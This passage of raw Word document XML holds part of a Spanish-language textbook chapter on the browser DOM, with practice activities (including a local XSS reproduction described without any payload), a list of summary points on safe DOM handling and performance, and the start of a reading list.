              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>4.6.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78EA794F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc239320020"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.15 — Las actividades, y qué busca cada una</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="563CCADA" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Siete actividades, y debajo de cada una lo que quiere que descubras.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753EF079" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc239320021"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>1. Árbol real</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="0A9C45A6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Dado un fragmento de marcado con indentación y comentarios, dibujar el árbol de nodos completo —incluidos los de texto— y verificarlo en la consola contando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>childNodes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>children</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2828B62A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Qué busca:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>ver la estructura que el HTML produce, con todo lo que vos no escribiste a propósito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE14053" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc239320022"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Catálogo sin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="286D8C8A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Construir un catálogo que inserte veinte tarjetas con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>createElement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, usando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Medir con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>console.time()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> y comparar con una versión que inserte una por una.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB5628D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Qué busca:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>que el número te convenza: la versión segura además es la rápida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02927B97" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc239320023"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>3. El ataque y sus dos defensas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="489C0474" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Reproducir el XSS de 4.7.2 en una página local, verificar en el panel de red que la petición sale, y neutralizarlo con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> y con DOMPurify. Documentar en qué caso sirve cada solución.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2463C39D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Qué busca:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>ver salir la petición al servidor del atacante: ahí RN-F02 deja de ser una regla del enunciado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225436FA" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc239320024"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4. Delegación en el carrito</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="13CDDF9A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementar un carrito donde cada ítem tiene botones de sumar, restar y quitar, con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>un solo manejador</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el contenedor. Verificar en el panel de escuchas que hay uno y que funciona con ítems agregados después.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C07D50F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Qué busca:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>comprobarlo con la herramienta, no de palabra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3385908B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc239320025"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>5. Ciclo de vida completo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="2606F426" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Escribir una función de montaje que registre tres suscripciones y devuelva una función de desmontaje con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>AbortController</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>. Demostrar con el panel de memoria que no quedan nodos separados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D10C80" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Qué busca:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>que el desmontaje deje de ser un acto de fe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D97B45" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc239320026"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>6. Exploración: el costo del recálculo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="735AC7C7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Escribir dos versiones de una función que ajuste el alto de cien tarjetas al de la más alta: una alternando lecturas y escrituras, otra separándolas. Grabar ambas con el panel de rendimiento y documentar la diferencia, relacionándola con la sección 4.10 y con el modelo de hilo único de la sección 3.10.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>(Requiere el panel de rendimiento.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAF0298" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Qué busca:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>conectar dos capítulos: el bloqueo del hilo visto en teoría y una causa concreta escrita por vos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6103713C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc239320027"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>7. Exploración: qué quedó de jQuery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="5C1BF9EA" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Tomar cinco operaciones habituales de jQuery —selección, clases, eventos, recorrido de ancestros, petición de red— y escribir el equivalente nativo, indicando en qué año se incorporó cada alternativa. Relacionarlo con 4.2 y con por qué jQuery dejó de hacer falta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384F6E29" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Qué busca:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>que veas la fecha al lado de cada método y saques solo la conclusión sobre React.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A41E0CD" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc239320028"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.16 — Síntesis: las once frases</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="2C5A045F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">El DOM nació de la incompatibilidad entre modelos rivales y se especificó </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>independiente del lenguaje</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>: esa neutralidad, no un descuido, explica su verbosidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14667992" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">El </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>modelo de eventos con dos fases es un compromiso político</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">: el W3C adoptó a la vez la captura de Netscape y el burbujeo de Microsoft, y el tercer parámetro de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>addEventListener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> existe por eso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A528D56" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">jQuery no fue reemplazada por algo mejor: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el problema que resolvía dejó de existir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>. Reconocerlo exige conocer el problema, y es la razón de fondo de la prohibición.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C04F808" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>El DOM no es el HTML.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Es un árbol vivo en memoria; el HTML es el texto que llegó. Serializarlo devuelve el árbol actual, con los errores de marcado corregidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AC11F0" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Las colecciones </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>vivas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> se actualizan mientras se las recorre, y de ahí un bug que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>funciona a medias</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>querySelectorAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> es la opción por defecto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25390585" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Atributo y propiedad no son lo mismo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>: el atributo conserva el valor inicial, la propiedad refleja el estado actual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17959749" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Asignar a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>parsea el texto como marcado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, y ahí nace el XSS. Filtrar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> no sirve: el vector real son los manejadores en línea. De ahí RN-F02, y nunca un sanitizador propio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D9886F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>La delegación es la opción por defecto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>, no una optimización: menos manejadores, funciona con elementos futuros y se da de baja de una vez.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1453FE04" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Un manejador </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>es una clausura</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, y una clausura mantiene vivo lo que referencia: quitar un nodo de la pantalla </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>no lo libera</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. De ahí RN-F01, y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>AbortController</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> es la forma limpia de cumplirla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7544A44F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Ninguna fuga de memoria se ve mirando la pantalla.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se ve en el panel de memoria, filtrando por nodos separados y leyendo la cadena de retención.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65606821" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Leer una propiedad de geometría </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>fuerza un recálculo inmediato</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>, y alternar lecturas y escrituras en un bucle bloquea el hilo: el problema del Capítulo 3 con otra causa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E879686" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc239320029"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.17 — Qué leer, y en qué orden</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="72A67907" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>El original las lista en dos párrafos densos; acá van por prioridad real.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777E0663" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc239320030"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Si leés una sola cosa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="38C8061E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">La </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>documentación de MDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>developer.mozilla.org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, es la consulta cotidiana para cada método de este capítulo. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Adoptala por encima de cualquier buscador</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
